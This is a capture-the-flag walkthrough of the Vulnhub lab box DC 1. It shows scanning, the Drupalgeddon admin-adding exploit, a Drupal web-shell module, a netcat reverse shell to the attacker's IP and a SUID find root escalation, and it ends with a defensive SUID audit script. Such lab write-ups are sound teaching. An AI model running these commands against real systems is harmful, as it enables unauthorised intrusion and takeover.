DC 1 (from the DC series)

The DC series was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge and your ability to learn. It is designed by DCAU. There are multiple ways of gaining root; however, they have included some flags which contain clues for beginners.

Level: Beginners. Hosted on Vulnhub. DC 1 release date: 28 Feb 2019

Start

The box does not show any IP address, so let’s start by scanning the network to find the target.

  1. netdiscover. Our target is 192.168.0.119

    Our box is running on VirtualBox, so its MAC vendor is PCS Systemtechnik.

Scanning

The next step is to scan the target and find out the operating system, the running services and the open ports on the server. For scanning we used nmap.

nmap -sV -sC -oA scan1 192.168.0.119

It’s a ‘noisy’ nmap scan. -sV probes the open ports to determine service/version info. -sC is equivalent to --script=default; it runs the default nmap scripts against the target host.

The nmap output shows us that there are 3 ports open: 22 (SSH), 80 (HTTP) and 111 (RPC). nmap also finds robots.txt, and the site is running the Drupal CMS (Drupal 7). Open the IP address in the browser to see what the web page looks like.

Nmap found the robots.txt file, and in that file we see some hidden directories. But I try to brute-force the web directories with gobuster.

gobuster dir -u http://192.168.0.119/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o dirScan

Drupal

After a bit of poking around, I search Google for "drupal scan" and try to find some tools and anything interesting about Drupal. I find a tool online called “Droopescan”.

Interesting! Most of it doesn’t mean much to me, I’m not a Drupal pro, but something in the back of my mind grabs my attention when I see the Drupal versions again. So I search with the searchsploit tool. This is an offline database of exploit-db.com.

searchsploit Drupal 7

Drupalgeddon is an SQL Injection that can add an admin user (Add Admin User), so I download the exploit with this command.

searchsploit -m exploits/php/webapps/34984.py

Running the exploit with python, we can see that it needs -t for the target URL, -u for the username and -p for the password. I give the target URL, username and password.

Use those credentials to log in as administrator.

Now we need a shell to get inside that server. So I search Google for "drupal shell" and I find a module that gives a web shell.

I find out that the module can be installed from a URL, so I copy the module URL.

To use that shell module, we need to activate the module.

After searching for the “Shell” URL, I find it in the Navigation menu. After visiting it, we can run commands on the back-end server. So, I decided to get a reverse shell to my machine using the “nc” utility.

For the native shell I use my favorite website, “http://pentestmonkey.net”.

nc -e /bin/sh 192.168.0.109 9001

Post-exploitation

Now I start checking for ways to root the server. There are many techniques to do that. One of them is searching for binaries that are owned by the root user and have “suid” set, which is a feature in Linux that allows users to execute files with the permissions of the file's owner. To search for files that have it, we run this command:

find / -perm /4000 2>/dev/null

Now we can become the root user by exploiting find with this command:

find . -exec '/bin/sh' \;
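
Seen from the defender's side, the escalation above depends on find carrying a SUID bit it does not need. The following is an added example, not part of the original post: a small audit that reuses the same find search and reports every SUID file that is not on an expected baseline. The allowlist paths and the function name audit_suid are assumptions for illustration.

```shell
#!/bin/sh
# Added example: flag SUID files that are not on an expected baseline.
# The allowlist is an assumption; build yours from a clean install of your distro.
SUID_ALLOWLIST="/usr/bin/passwd /usr/bin/su /usr/bin/sudo /usr/bin/mount
/usr/bin/umount /usr/bin/chsh /usr/bin/chfn /usr/bin/newgrp /usr/bin/gpasswd"

# audit_suid ROOT
# Prints one "UNEXPECTED-SUID <path> owner=<user>" line for every SUID file
# under ROOT whose path (relative to ROOT) is not on the allowlist.
# Full paths are compared, so a SUID file merely named "passwd" in another
# directory is still reported.
audit_suid() {
    root="${1:-/}"
    root="${root%/}"                      # "/" becomes "", "/mnt/img/" -> "/mnt/img"
    # Same permission test as in the write-up (-4000 and /4000 match this one bit).
    find "${root:-/}" -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r path; do
        rel="${path#"$root"}"             # path as it would appear on the live system
        # Unquoted expansion splits the allowlist into one path per line.
        printf '%s\n' $SUID_ALLOWLIST | grep -qxF -- "$rel" && continue
        owner=$(ls -ld "$path" | awk '{print $3}')
        printf 'UNEXPECTED-SUID %s owner=%s\n' "$path" "$owner"
    done
}

# Run as a script with a directory argument, e.g. ./suid_audit.sh /
# Without an argument the file only defines the function.
if [ "$#" -gt 0 ]; then
    audit_suid "$1"
fi
```

Where a reported binary such as find has no reason to be SUID, running chmod u-s on it removes the escalation path used above.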

Hope that you learn something new by reading this post.

